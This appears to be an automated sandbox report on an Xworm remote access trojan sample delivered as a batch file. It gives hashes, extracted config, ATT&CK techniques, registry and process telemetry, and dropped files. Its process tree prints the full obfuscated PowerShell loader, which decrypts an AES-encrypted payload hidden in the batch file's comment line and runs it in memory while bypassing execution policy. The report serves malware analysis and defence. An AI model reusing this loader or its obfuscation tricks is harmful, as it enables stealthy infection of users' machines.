xworm | be385f657b8f5460860b3ed2040c194ed52b8605bb32120df2cc675fd8ef5cf4

Resubmissions

01/03/2025, 15:56

250301-tdsetavwav 10

17/01/2025, 23:44

250117-3rmk6axmbr 10

Analysis

max time kernel
149s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
01/03/2025, 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient445.bat
Size

100KB
MD5

fae4477da536f3adbabea61ddd20792f
SHA1

f81caca3fae8a78e94333981f51cdf542c36eba9
SHA256

be385f657b8f5460860b3ed2040c194ed52b8605bb32120df2cc675fd8ef5cf4
SHA512

309da6ca1509e593c25d0eede1ff0c331cb1586cd8d21873a1c54ba7c9f55ca59b0af6590d092a086ee7e96a699e79ff57f9494d54fdf5c1c7b9c256a575e411
SSDEEP

1536:XxQgYbiOtDPxTTeMhggpzmryO6hdwNaF6zeiBoM0HhtYaAfBbLvs5Om3l3J4dlVQ:BPYuOxRBxcryOfaF+dO3h1AxxmV3QTn0

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:4455

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2528-15-0x00000167F3BC0000-0x00000167F3BDC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	2528	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2528	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133853182481866975"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2528	powershell.exe
2528	powershell.exe
3712	chrome.exe
3712	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4732 wrote to memory of 2528	4732	cmd.exe	83
PID 4732 wrote to memory of 2528	4732	cmd.exe	83
PID 3712 wrote to memory of 5012	3712	chrome.exe	91
PID 3712 wrote to memory of 5012	3712	chrome.exe	91
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 4360	3712	chrome.exe	92
PID 3712 wrote to memory of 2756	3712	chrome.exe	93
PID 3712 wrote to memory of 2756	3712	chrome.exe	93
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94
PID 3712 wrote to memory of 2024	3712	chrome.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient445.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FnXW6089kyQfX/ZDAGhpSQ4fEs7cY3ZPeH9p6jnZbIg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Zs+znnGkXTCMWD7SFkCCFQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OPYdp=New-Object System.IO.MemoryStream(,$param_var); $gSihn=New-Object System.IO.MemoryStream; $VUpvj=New-Object System.IO.Compression.GZipStream($OPYdp, [IO.Compression.CompressionMode]::Decompress); $VUpvj.CopyTo($gSihn); $VUpvj.Dispose(); $OPYdp.Dispose(); $gSihn.Dispose(); $gSihn.ToArray();}function execute_function($param_var,$param2_var){ $ZCSbl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvlLp=$ZCSbl.EntryPoint; $DvlLp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient445.bat';$DRjgs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient445.bat').Split([Environment]::NewLine);foreach ($anTQm in $DRjgs) { if ($anTQm.StartsWith(':: ')) { $SqvTA=$anTQm.Substring(3); break; }}$payloads_var=[string[]]$SqvTA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd1a26cc40,0x7ffd1a26cc4c,0x7ffd1a26cc58
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2116 /prefetch:8
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3084,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4376 /prefetch:1
  2⤵
  PID:2716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4616 /prefetch:8
  2⤵
  PID:4544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4760,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4892 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
  PID:3600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5156,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:8
  2⤵
  PID:3128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  PID:1208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4608,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5240 /prefetch:8
  2⤵
  PID:2036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5224,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5172 /prefetch:2
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4676,i,434444499079986926,4573233724194756582,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2228

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3468

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:3904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
c705f3a38b3f5f862520a101ecb656a2

SHA1
7d2b3c7c290f0a384c1e641649ab2327ed512d0d

SHA256
0ab0d1ae33d01d08c77d7c8bf4f296e0df198835186bde55b115fa699e6d41f7

SHA512
c6a860af2090eb3d90443695225d241419fb1b59d5824d4c11c710b6a5a56dc0b7d8bc94685a602ffdaef557746be551aea4c09bf208870d5b4171d11da453ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
0284df3ec1dab5e4be73ba4b7fc5df7f

SHA1
e2fad06a286a0fc0b4f6bde7632e215a5cf23939

SHA256
93113051fa14f92c70ae0cf34385acf5da5e57f91f0abe69cc06acfde597503d

SHA512
963db2918e8118060f0f78991f17c3c43ed2e5167b4440f0583ae4ed2e214c482d575ec85666a41a0e5cb968f9950decaadeef332ad605503c0dc0b9cb1b3c60

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
f08883df1544c3ed8079f695d65eb3c5

SHA1
04bacceaeb3b722eea5bb0d746a3ecc7a14672c6

SHA256
bc618d9a7a3fb03ab58e9b227c08e7827ac335c2b8064548a5240a62ae1b9712

SHA512
